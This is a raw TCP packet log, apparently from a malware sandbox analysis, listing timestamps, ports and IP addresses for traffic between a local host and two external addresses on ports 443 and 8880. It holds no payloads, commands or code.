Oct 5, 2024 01:03:23.354871035 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.354895115 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.356837988 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.388890028 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.388951063 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.388995886 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.389010906 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.389034033 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.389050961 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.389921904 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.389964104 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.390002966 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.390019894 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.390042067 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.390760899 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.390813112 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.390821934 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.390847921 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.390876055 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.390899897 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.391643047 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.391686916 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.391717911 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.391730070 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.391760111 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.391776085 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.392509937 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.392558098 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.392589092 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.392600060 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.392621994 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.394334078 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.394381046 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.394403934 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.394423008 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.394444942 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.394463062 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.395231962 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.395283937 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.395319939 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.395332098 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.395354986 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.395373106 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.458722115 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.458786964 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.458863020 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.458888054 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.458918095 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.458957911 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.476502895 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.476568937 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.476602077 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.476613998 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.476635933 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.476692915 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.477261066 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.477319956 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.477349997 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.477360964 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.477385044 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.477404118 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.478233099 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.478281021 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.478312016 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.478322983 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.478348970 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.478368044 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.478910923 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.478956938 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.478990078 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.479001999 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.479031086 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.479047060 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.479777098 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.479823112 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.479856014 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.479866982 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.479893923 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.481584072 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.481632948 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.481669903 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.481683016 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.481709003 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.482439995 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.482477903 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.482506990 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.482525110 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.482547045 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.483040094 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.486042023 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.546026945 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.546106100 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.546123028 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.546139956 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.546178102 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.546269894 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.546420097 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.546446085 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.546468019 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.546814919 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.574019909 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.574105978 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.574866056 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.575826883 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.575860977 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.301950932 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.303256035 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.303284883 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.645683050 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.645715952 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.645735979 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.645895004 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.645972013 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.646048069 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.754889011 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.754954100 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.755048037 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.755048037 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.755143881 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.755208015 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.867681026 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.867744923 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.867882013 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.867882013 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.867944956 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.868010044 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.868474960 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.868542910 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.868659019 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.868659019 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.868722916 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.868776083 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.869760990 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.869826078 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.869920969 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.869920969 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.869985104 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.870085955 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.984934092 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.984999895 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.985102892 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.985102892 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.985167027 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.985229969 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.985902071 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.985950947 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.985990047 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.986002922 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.986037016 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.986058950 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.986752987 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.986794949 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.986833096 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.986845016 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.986871958 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.986888885 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.988074064 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.988116980 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.988158941 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.988169909 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.988198996 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.988221884 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.988857985 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.988900900 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.988936901 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.988948107 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:24.988979101 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:24.988996983 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.294089079 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.294152021 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.294236898 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.294302940 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.294343948 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.294672012 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.294724941 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.294763088 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.294778109 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.294806004 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.294826031 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.295344114 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.295408010 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.295423985 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.295442104 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.295488119 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.295488119 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300209999 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300261021 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300314903 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300327063 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300355911 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300376892 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300420046 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300461054 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300497055 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300507069 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300533056 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300590038 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300668001 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300708055 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300744057 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300755024 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300781012 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300797939 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300813913 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300868034 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300895929 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300910950 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.300941944 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.300956964 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.301791906 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.301835060 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.301872969 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.301882982 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.301912069 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.301942110 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.303039074 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.303081036 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.303113937 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.303124905 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.303169966 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.303189993 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.304114103 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.304158926 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.304195881 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.304205894 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.304239988 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.304259062 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.304732084 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.304780006 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.304817915 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.304828882 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.304855108 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.304883957 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.305722952 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.305762053 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.305799961 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.305809975 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.305836916 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.305881023 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.306615114 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.306663990 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.306690931 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.306701899 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.306725979 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.306745052 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.306957960 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.307002068 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.307034969 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.307044983 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.307070017 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.307094097 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.307177067 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.307215929 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.307255030 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.307265997 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.307291985 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.307308912 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.307909012 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.307960987 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.308003902 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.308015108 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.308041096 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.308082104 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.308835983 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.308881998 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.308918953 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.308928967 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.308955908 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.308971882 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.309730053 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.309777975 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.309815884 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.309825897 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.309851885 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.309880018 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.311232090 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.311274052 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.311311960 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.311321974 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.311348915 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.311422110 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.311593056 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.311639071 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.311674118 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.311683893 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.311711073 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.311729908 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.313127995 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.313179016 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.313216925 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.313227892 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.313257933 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.313281059 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.314090967 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.314132929 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.314169884 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.314192057 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.314215899 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.314238071 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.314946890 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.314985991 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.315021992 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.315032959 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.315059900 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.315076113 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.315129995 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.315207005 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.315217972 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.315311909 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.315537930 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.315562010 CEST	443	49755	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:25.315586090 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:25.315617085 CEST	49755	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:28.166790962 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:03:28.174699068 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:03:28.174889088 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:03:28.625899076 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:03:28.632050991 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:03:28.889744043 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:03:28.931452990 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:03:29.011471033 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:03:29.016311884 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:03:29.227072001 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:03:29.275226116 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:03:59.229279995 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:03:59.234548092 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:03:59.445337057 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:03:59.494371891 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:04:29.463908911 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:04:29.470623970 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:04:29.681627989 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:04:29.729095936 CEST	49756	8880	192.168.2.4	31.42.187.210
